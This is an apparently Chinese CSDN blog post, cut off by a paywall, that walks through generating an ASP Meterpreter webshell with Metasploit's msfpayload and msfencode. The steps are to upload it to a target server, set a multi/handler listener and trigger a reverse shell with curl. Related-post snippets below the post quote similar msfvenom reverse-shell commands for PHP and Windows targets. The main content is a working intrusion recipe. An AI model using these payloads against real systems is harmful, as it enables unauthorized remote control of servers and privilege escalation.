msf生成webshell_msf 之 webshell 提权

最新推荐文章于 2024-06-17 09:46:57 发布
最新推荐文章于 2024-06-17 09:46:57 发布
阅读量357 收藏 1
点赞数
文章标签: msf生成webshell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39623411/article/details/111836434
版权

首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大 ^_^)

Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,以便进一步利用。

下面是具体的利用方法。

我们可以通过指令查看msf里的payload 然后记住其位置:使用如下的指令来产生一个webshell,和前边将的msfpayload的用法类似,只不过这里生成的是一个网页脚本文件:

产生webshell

msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip | msfencode -t asp -o webshell.asp

然后将此webshell上传到服务器(这个步骤要有上传权限。)

然后启动msfconsole

输入use exploits/multi/handler,

set PAYLOAD windows/meterpreter/reverse_tcp(这里的payload要和前边的msfpayload所使用的一样。

set LHOST your_ip,

执行exploit,

然 后访问webshell的url,这里使用curl 访问curl http://host/webshell.asp ,如果exploit执行成功的话就可以看到msfconsole中有返回meterpreter shell,如果meterpre

最低0.47元/天 解锁文章
weixin_39623411
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msf生成webshell攻击服务器
afei001
03-22 966
实验环境 攻击机:kali   IP:192.168.3.157 靶机:win 10(已搭建WAMP) 生成Webshell攻击服务器 1.在kali上生成Webshell Payload root@afei:~# msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.3.157 lport=5555 -f raw > shel...
msf生成webshell_生成常用的msf
weixin_39759441的博客
12-22 701
msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。在kali下可以使用如下命令列出MSFVenom可以生成的payload列表:msfvenom -l生成二进制文件关于二进制文件,主要介绍适用于Windows、linux、ma...
msf生成webshell_MSFWeb渗透
weixin_36212560的博客
01-13 809
WebShellroot@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=3333 -f raw -o a.php 生成a.phpmsf > use exploit/multi/handlermsf exploit(handler) > set payload php/meterpr...
msf生成webshell_Metasploit 之使用socket通信的webshell简单分析
weixin_39693193的博客
12-22 330
Metasploit 之使用socket通信的webshell简单分析upload (Van Helsing) | 2013-01-08 21:530x01 前言常规的webshell都是调用该语言中常用函数来完成读取、执行等操作,从协议上来讲是采用http/https协议。但是和服务器通信还有另外一种方式:socket通信。常见的脚本语言asp,php,jsp,都可以实现对应的socket编程...
【深度解析】ShellGenerate:您的WebShell生成利器!
最新发布
gitblog_00094的博客
06-17 389
????【深度解析】ShellGenerate:您的WebShell生成利器! 项目地址:https://gitcode.com/Ni4n/ShellGenerate ✨ 项目介绍 在网络安全领域,了解并掌握渗透测试工具的重要性不言而喻。今天,我们将要深入探究一款功能强大的Java WebShell生成工具——ShellGenerate。该工具深受安全研究人员和白帽黑客的喜爱,其灵感源自于网络上广为人知...
Metasploit 之 webshell 提权
weixin_34314962的博客
07-30 168
本文所涉及的方法只能在已授权的机器上做测试。 首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf提权(因为msf里边有个meterpreter很强大 ^_^) Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型webs...
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
常见windwos提权笔记
03-30
- **过程**: 通常先通过webshell上线到CS,再通过CS提供的功能进行提权。 ##### 5.3 MSF(Metasploit Framework)的shell - **Metasploit**: 强大的渗透测试框架,支持广泛的漏洞利用模块。 - **提权**: 通过MSF的...
攻击工具分析:哥斯拉(Godzilla)1
08-03
它还支持数据库管理,MSF(Metasploit Framework)联动,OpenBasedir绕过,ZIP压缩与解压,代码执行绕过DisableFunctions,以及使用Mimikatz读取敏感信息等高级功能。此外,它还可以获取服务器上如FileZilla、...
《安天365安全研究》第二期.pdf
08-07
2.6MSSQL sa 弱口令提权基础知识学习 2.6.1“扩展存储过程”中的 xp_cmdshell 2.6.2 利用 xp_cmdshell 存储过程添加账号 2.6.3OLE 相关存储过程添加账户 2.6.3xp_regread & xp_regwrite 克隆账号 2.6.4MSSQL 存储...
MySQL数据库渗透及漏洞利用总结
02-25
各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用与提权》,但...
webshell生成
12-30
本工具,可以直接生成WEBSHELL提权用的文件。
MSF-从webshell到完全控制
scrawman的博客
01-18 883
文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import
msf生成webshell_CVE-2017-11882漏洞复现结合MSF拿电脑shell
weixin_32139875的博客
01-16 451
两个代码分别贴上[Python] 纯文本查看 复制代码import argparseimport sysRTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}{\*\generator Riched20 6.3.9600}\viewkin...
kali攻防第13章 Metasploit之生成webshell及应用
安全参透之旅
12-24 6359
Metasploit之生成webshell及应用   准备工具 1、kali 系统 IP 10.10.10.131 2、受害者机子 IP 10.10.10.130 3、使用工具 Metasploit   步骤:   1、在msf生成asp脚本木马 root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.
Metasploit(后渗透攻击:web后门)
qq_41453632的博客
12-10 4768
web后门泛指webshell,其实就是一段网页代码,包括ASP. ASP.NET. PHP. JSP. 代码等。由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。这也是攻击者控制服务器的一个方法,比一般的入侵更具隐蔽性。 1.meterpreter后门    在metasploit中,...
小白必学:msf基本使用
fly_enum的博客
10-31 684
网络安全很多技术干货,都可以共享给你们,如果你肯花时间沉下心去学习,它们一定能帮到你网络安全工程师学习资料包循序渐进地对黑客攻防剖析。适合不同层次的粉丝。我希望能为大家提供切实的帮助,讲解通俗易懂,风趣幽默,风格清新活泼,学起来轻松自如,酣畅淋漓!如果你想要入坑黑客&网络安全工程师,这份282G全网最全的网络安全资料包!网络安全大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享👉网安(嘿客红蓝对抗)所有方向的学习路线👈对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
Bypass-JSPWebshell自动生成工具
G0mini的博客
08-07 1130
Bypass-JSPWebshell自动生成工具
内网渗透实战:从Webshell到权限提升
1. 利用Metasploit框架(msf生成远程控制木马。在生成木马时,需考虑目标服务器可能存在的反病毒软件,因此可能需要对shellcode进行编码或免杀处理。具体命令示例为`msfvenom -p windows/x64/meterpreter_reverse_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值